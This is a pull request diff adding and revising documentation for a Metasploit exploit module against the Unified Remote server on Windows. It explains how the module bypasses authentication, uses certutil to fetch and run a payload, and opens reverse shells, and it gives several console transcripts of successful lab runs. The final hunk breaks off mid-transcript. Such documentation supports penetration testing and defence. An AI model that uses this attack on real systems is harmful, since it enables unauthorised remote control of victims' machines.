### PR TITLE
unified_remote exploit

### DIFF
--- a/documentation/modules/exploit/windows/misc/unified_remote_rce.md
+++ b/documentation/modules/exploit/windows/misc/unified_remote_rce.md
@@ -1,0 +1,275 @@
+## Vulnerable Application
+
+This module utilizes the Unified Remote remote control protocol to type out and
+deploy a payload.  The remote control protocol can be configured to have no passwords,
+a group password, or individual user accounts.  If the web page is accessible, the
+access control is set to no password for exploitation, then reverted.
+If the web page is not accessible, exploitation will be tried blindly.
+
+This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
+
+Version 3.11.0.2483 can be downloaded from
+[unifiedremote.com](https://www.unifiedremote.com/static/builds/server/windows-x86/2483/ServerSetup-3.11.0.2483.exe)
+
+## Targets
+
+### Pull
+
+The pull target uses an HTTP server on the Metasploit host, and `certutil.exe` to pull the payload down and execute it.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/unified_remote_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell.
+
+## Options
+
+
+### WEBSERVER
+
+The port the web server is running on.  Defaults to `9510`
+
+### CLIENTNAME
+
+The name of the client device to use.  This shows up in the Unified Remote logs. If empty
+A random android based name is chosen. Defaults to ``
+
+### SLEEP
+
+The length of time to sleep between each command, this gives the remote program time to process the command on screen.
+Defaults to `1` second.
+
+### PATH
+
+This ONLY applies to the pull method.  Where to temporarily store the payload.  Defaults to `c:\\Windows\\Temp\\`
+
+## Scenarios
+
+### Version 3.11.0.2483 on Windows 10, No authentication
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (unified.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
+[*] 192.168.2.95:9512 - Retrieving server config
+[+] 192.168.2.95:9512 - No security enabled
+[+] 192.168.2.95:9512 - Found account: admin
+[+] 192.168.2.95:9512 - Found account: wheres
+[*] 192.168.2.95:9512 - Sending handshake part 1
+[*] 192.168.2.95:9512 - Sending handshake part 2
+[*] 192.168.2.95:9512 - Opening Start Menu
+[*] 192.168.2.95:9512 - Opening command prompt
+[*] 192.168.2.95:9512 - Typing out payload
+[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
+[*] 192.168.2.95:9512 - Attempting to pull down payload
+[*] 192.168.2.95:9512 - Attempting to open payload
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:59233) at 2022-09-08 16:47:20 -0400
+[*] 192.168.2.95:9512 - Server stopped.
+[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+### Version 3.11.0.2483 on Windows 10, group authentication
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (unified.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:9512 - Client name set to: android-ergZhp49nDBmGXz8
+[*] 192.168.2.95:9512 - Retrieving server config
+[*] 192.168.2.95:9512 - anonymous mode enabled, password required, bypassing
+[*] 192.168.2.95:9512 - Uploading new server config
+[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
+[+] 192.168.2.95:9512 - Found account: admin
+[+] 192.168.2.95:9512 - Found account: wheres
+[*] 192.168.2.95:9512 - Sending handshake part 1
+[*] 192.168.2.95:9512 - Sending handshake part 2
+[*] 192.168.2.95:9512 - Opening Start Menu
+[*] 192.168.2.95:9512 - Opening command prompt
+[*] 192.168.2.95:9512 - Typing out payload
+[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
+[*] 192.168.2.95:9512 - Attempting to pull down payload
+[*] 192.168.2.95:9512 - Attempting to open payload
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] 192.168.2.95:9512 - Reverting security mode
+[*] 192.168.2.95:9512 - Uploading new server config
+[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:59596) at 2022-09-08 16:50:21 -0400
+[*] 192.168.2.95:9512 - Server stopped.
+[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```
+
+### Version 3.11.0.2483 on Windows 10, user authentication
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (unified.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
+[*] 192.168.2.95:9512 - Retrieving server config
+[*] 192.168.2.95:9512 - users mode enabled, password required, bypassing
+[*] 192.168.2.95:9512 - Uploading new server config
+[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
+[+] 192.168.2.95:9512 - Found account: admin
+[+] 192.168.2.95:9512 - Found account: wheres
+[*] 192.168.2.95:9512 - Sending handshake part 1
+[*] 192.168.2.95:9512 - Sending handshake part 2
+[*] 192.168.2.95:9512 - Opening Start Menu
+[*] 192.168.2.95:9512 - Opening command prompt
+[*] 192.168.2.95:9512 - Typing out payload
+[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
+[*] 192.168.2.95:9512 - Attempting to pull down payload
+[*] 192.168.2.95:9512 - Attempting to open payload
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] 192.168.2.95:9512 - Reverting security mode
+[*] 192.168.2.95:9512 - Uploading new server config
+[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:59932) at 2022-09-08 16:53:05 -0400
+[*] 192.168.2.95:9512 - Server stopped.
+[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```
+
+### Version 3.11.0.2483 on Windows 10, no authentication, no web server access
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (unified.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
+[*] 192.168.2.95:9512 - Retrieving server config
+[-] 192.168.2.95:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
+[*] 192.168.2.95:9512 - Sending handshake part 1
+[*] 192.168.2.95:9512 - Sending handshake part 2
+[*] 192.168.2.95:9512 - Opening Start Menu
+[*] 192.168.2.95:9512 - Opening command prompt
+[*] 192.168.2.95:9512 - Typing out payload
+[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
+[*] 192.168.2.95:9512 - Attempting to pull down payload
+[*] 192.168.2.95:9512 - Attempting to open payload
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:60829) at 2022-09-08 17:00:30 -0400
+[*] 192.168.2.95:9512 - Server stopped.
+[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```
+
+### Version 3.11.0.2483 on Windows 10, user authentication, no web server access
+
+This will fail.
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (unified.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
+[*] 192.168.2.95:9512 - Retrieving server config
+[-] 192.168.2.95:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
+[*] 192.168.2.95:9512 - Sending handshake part 1
+[*] 192.168.2.95:9512 - Sending handshake part 2
+[*] 192.168.2.95:9512 - Opening Start Menu
+[*] 192.168.2.95:9512 - Opening command prompt
+[*] 192.168.2.95:9512 - Typing out payload
+[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
+[*] 192.168.2.95:9512 - Attempting to pull down payload
+[*] 192.168.2.95:9512 - Attempting to open payload
+[*] 192.168.2.95:9512 - Server stopped.
+[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
+[*] Exploit completed, but no session was created.
+```

--- a/documentation/modules/exploit/windows/misc/unified_remote_rce.md
+++ b/documentation/modules/exploit/windows/misc/unified_remote_rce.md
@@ -11,12 +11,6 @@ This module has been successfully tested against version 3.11.0.2483 (50) on Win
 Version 3.11.0.2483 can be downloaded from
 [unifiedremote.com](https://www.unifiedremote.com/static/builds/server/windows-x86/2483/ServerSetup-3.11.0.2483.exe)
 
-## Targets
-
-### Pull
-
-The pull target uses an HTTP server on the Metasploit host, and `certutil.exe` to pull the payload down and execute it.
-
 ## Verification Steps
 
 1. Install the application
@@ -47,42 +41,90 @@ Defaults to `1` second.
 
 This ONLY applies to the pull method.  Where to temporarily store the payload.  Defaults to `c:\\Windows\\Temp\\`
 
+### VISIBLE
+
+If set to `true`, uses a 'standard' method of typing to the screen. If set to `false`
+utilizes a 'pro' feature of unified remote to execute a script in the background.
+Defaults to `false`
+
 ## Scenarios
 
-### Version 3.11.0.2483 on Windows 10, No authentication
+### Version 3.11.0.2483 on Windows 10, No authentication, visible false
 
 ```
 resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
 [*] Using configured payload windows/shell/reverse_tcp
-resource (unified.rb)> set rhosts 192.168.2.95
-rhosts => 192.168.2.95
-resource (unified.rb)> set lhost 192.168.2.199
-lhost => 192.168.2.199
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-ASvxWyO708Rv4x0j
+[*] 2.2.2.2:9512 - Retrieving server config
+[+] 2.2.2.2:9512 - No security enabled
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Loading Unified.Command
+[*] 2.2.2.2:9512 - Updating Unified.Command
+[*] 2.2.2.2:9512 - Sending payload
+[*] 2.2.2.2:9512 - Executing script
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50052) at 2022-09-18 19:00:33 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\U4culUYTuG.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>
+```
+
+### Version 3.11.0.2483 on Windows 10, No authentication, visible true
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
 resource (unified.rb)> set verbose true
 verbose => true
 msf6 exploit(windows/misc/unified_remote_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.2.199:4444 
-[*] 192.168.2.95:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
-[*] 192.168.2.95:9512 - Retrieving server config
-[+] 192.168.2.95:9512 - No security enabled
-[+] 192.168.2.95:9512 - Found account: admin
-[+] 192.168.2.95:9512 - Found account: wheres
-[*] 192.168.2.95:9512 - Sending handshake part 1
-[*] 192.168.2.95:9512 - Sending handshake part 2
-[*] 192.168.2.95:9512 - Opening Start Menu
-[*] 192.168.2.95:9512 - Opening command prompt
-[*] 192.168.2.95:9512 - Typing out payload
-[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
-[*] 192.168.2.95:9512 - Attempting to pull down payload
-[*] 192.168.2.95:9512 - Attempting to open payload
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
+[*] 2.2.2.2:9512 - Retrieving server config
+[+] 2.2.2.2:9512 - No security enabled
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
 [*] Encoded stage with x86/shikata_ga_nai
-[*] Sending encoded stage (267 bytes) to 192.168.2.95
-[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:59233) at 2022-09-08 16:47:20 -0400
-[*] 192.168.2.95:9512 - Server stopped.
-[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59233) at 2022-09-08 16:47:20 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target
 
 
 Shell Banner:
@@ -102,45 +144,44 @@ OS Name:                   Microsoft Windows 10 Pro
 OS Version:                10.0.16299 N/A Build 16299
 ```
 
-### Version 3.11.0.2483 on Windows 10, group authentication
+### Version 3.11.0.2483 on Windows 10, group authentication, visible true
 
 ```
 resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
 [*] Using configured payload windows/shell/reverse_tcp
-resource (unified.rb)> set rhosts 192.168.2.95
-rhosts => 192.168.2.95
-resource (unified.rb)> set lhost 192.168.2.199
-lhost => 192.168.2.199
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
 resource (unified.rb)> set verbose true
 verbose => true
 msf6 exploit(windows/misc/unified_remote_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.2.199:4444 
-[*] 192.168.2.95:9512 - Client name set to: android-ergZhp49nDBmGXz8
-[*] 192.168.2.95:9512 - Retrieving server config
-[*] 192.168.2.95:9512 - anonymous mode enabled, password required, bypassing
-[*] 192.168.2.95:9512 - Uploading new server config
-[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
-[+] 192.168.2.95:9512 - Found account: admin
-[+] 192.168.2.95:9512 - Found account: wheres
-[*] 192.168.2.95:9512 - Sending handshake part 1
-[*] 192.168.2.95:9512 - Sending handshake part 2
-[*] 192.168.2.95:9512 - Opening Start Menu
-[*] 192.168.2.95:9512 - Opening command prompt
-[*] 192.168.2.95:9512 - Typing out payload
-[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
-[*] 192.168.2.95:9512 - Attempting to pull down payload
-[*] 192.168.2.95:9512 - Attempting to open payload
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-ergZhp49nDBmGXz8
+[*] 2.2.2.2:9512 - Retrieving server config
+[*] 2.2.2.2:9512 - anonymous mode enabled, password required, bypassing
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
 [*] Encoded stage with x86/shikata_ga_nai
-[*] Sending encoded stage (267 bytes) to 192.168.2.95
-[*] 192.168.2.95:9512 - Reverting security mode
-[*] 192.168.2.95:9512 - Uploading new server config
-[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
-[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:59596) at 2022-09-08 16:50:21 -0400
-[*] 192.168.2.95:9512 - Server stopped.
-[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] 2.2.2.2:9512 - Reverting security mode
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59596) at 2022-09-08 16:50:21 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
 
 
 Shell Banner:
@@ -151,45 +192,44 @@ Microsoft Windows [Version 10.0.16299.125]
 C:\Users\windows>
 ```
 
-### Version 3.11.0.2483 on Windows 10, user authentication
+### Version 3.11.0.2483 on Windows 10, user authentication, visible true
 
 ```
 resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
 [*] Using configured payload windows/shell/reverse_tcp
-resource (unified.rb)> set rhosts 192.168.2.95
-rhosts => 192.168.2.95
-resource (unified.rb)> set lhost 192.168.2.199
-lhost => 192.168.2.199
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
 resource (unified.rb)> set verbose true
 verbose => true
 msf6 exploit(windows/misc/unified_remote_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.2.199:4444 
-[*] 192.168.2.95:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
-[*] 192.168.2.95:9512 - Retrieving server config
-[*] 192.168.2.95:9512 - users mode enabled, password required, bypassing
-[*] 192.168.2.95:9512 - Uploading new server config
-[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
-[+] 192.168.2.95:9512 - Found account: admin
-[+] 192.168.2.95:9512 - Found account: wheres
-[*] 192.168.2.95:9512 - Sending handshake part 1
-[*] 192.168.2.95:9512 - Sending handshake part 2
-[*] 192.168.2.95:9512 - Opening Start Menu
-[*] 192.168.2.95:9512 - Opening command prompt
-[*] 192.168.2.95:9512 - Typing out payload
-[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
-[*] 192.168.2.95:9512 - Attempting to pull down payload
-[*] 192.168.2.95:9512 - Attempting to open payload
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
+[*] 2.2.2.2:9512 - Retrieving server config
+[*] 2.2.2.2:9512 - users mode enabled, password required, bypassing
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
 [*] Encoded stage with x86/shikata_ga_nai
-[*] Sending encoded stage (267 bytes) to 192.168.2.95
-[*] 192.168.2.95:9512 - Reverting security mode
-[*] 192.168.2.95:9512 - Uploading new server config
-[*] 192.168.2.95:9512 - Sleeping 5 seconds for server to restart
-[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:59932) at 2022-09-08 16:53:05 -0400
-[*] 192.168.2.95:9512 - Server stopped.
-[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] 2.2.2.2:9512 - Reverting security mode
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59932) at 2022-09-08 16:53:05 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target
 
 
 Shell Banner:
@@ -200,38 +240,37 @@ Microsoft Windows [Version 10.0.16299.125]
 C:\Users\windows>
 ```
 
-### Version 3.11.0.2483 on Windows 10, no authentication, no web server access
+### Version 3.11.0.2483 on Windows 10, no authentication, no web server access, visible true
 
 ```
 resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
 [*] Using configured payload windows/shell/reverse_tcp
-resource (unified.rb)> set rhosts 192.168.2.95
-rhosts => 192.168.2.95
-resource (unified.rb)> set lhost 192.168.2.199
-lhost => 192.168.2.199
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
 resource (unified.rb)> set verbose true
 verbose => true
 msf6 exploit(windows/misc/unified_remote_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.2.199:4444 
-[*] 192.168.2.95:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
-[*] 192.168.2.95:9512 - Retrieving server config
-[-] 192.168.2.95:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
-[*] 192.168.2.95:9512 - Sending handshake part 1
-[*] 192.168.2.95:9512 - Sending handshake part 2
-[*] 192.168.2.95:9512 - Opening Start Menu
-[*] 192.168.2.95:9512 - Opening command prompt
-[*] 192.168.2.95:9512 - Typing out payload
-[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
-[*] 192.168.2.95:9512 - Attempting to pull down payload
-[*] 192.168.2.95:9512 - Attempting to open payload
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
-[+] 192.168.2.95:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
+[*] 2.2.2.2:9512 - Retrieving server config
+[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
 [*] Encoded stage with x86/shikata_ga_nai
-[*] Sending encoded stage (267 bytes) to 192.168.2.95
-[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:60829) at 2022-09-08 17:00:30 -0400
-[*] 192.168.2.95:9512 - Server stopped.
-[!] 192.168.2.95:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60829) at 2022-09-08 17:00:30 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target
 
 
 Shell Banner:
@@ -242,34 +281,33 @@ Microsoft Windows [Version 10.0.16299.125]
 C:\Users\windows>
 ```
 
-### Version 3.11.0.2483 on Windows 10, user authentication, no web server access
+### Version 3.11.0.2483 on Windows 10, user authentication, no web server access, visible true
 
 This will fail.
 
 ```
 resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
 [*] Using configured payload windows/shell/reverse_tcp
-resource (unified.rb)> set rhosts 192.168.2.95
-rhosts => 192.168.2.95
-resource (unified.rb)> set lhost 192.168.2.199
-lhost => 192.168.2.199
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
 resource (unified.rb)> set verbose true
 verbose => true
 msf6 exploit(windows/misc/unified_remote_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.2.199:4444 
-[*] 192.168.2.95:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
-[*] 192.168.2.95:9512 - Retrieving server config
-[-] 192.168.2.95:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
-[*] 192.168.2.95:9512 - Sending handshake part 1
-[*] 192.168.2.95:9512 - Sending handshake part 2
-[*] 192.168.2.95:9512 - Opening Start Menu
-[*] 192.168.2.95:9512 - Opening command prompt
-[*] 192.168.2.95:9512 - Typing out payload
-[*] 192.168.2.95:9512 - Using URL: http://192.168.2.199:8080/
-[*] 192.168.2.95:9512 - Attempting to pull down payload
-[*] 192.168.2.95:9512 - Attempting to open payload
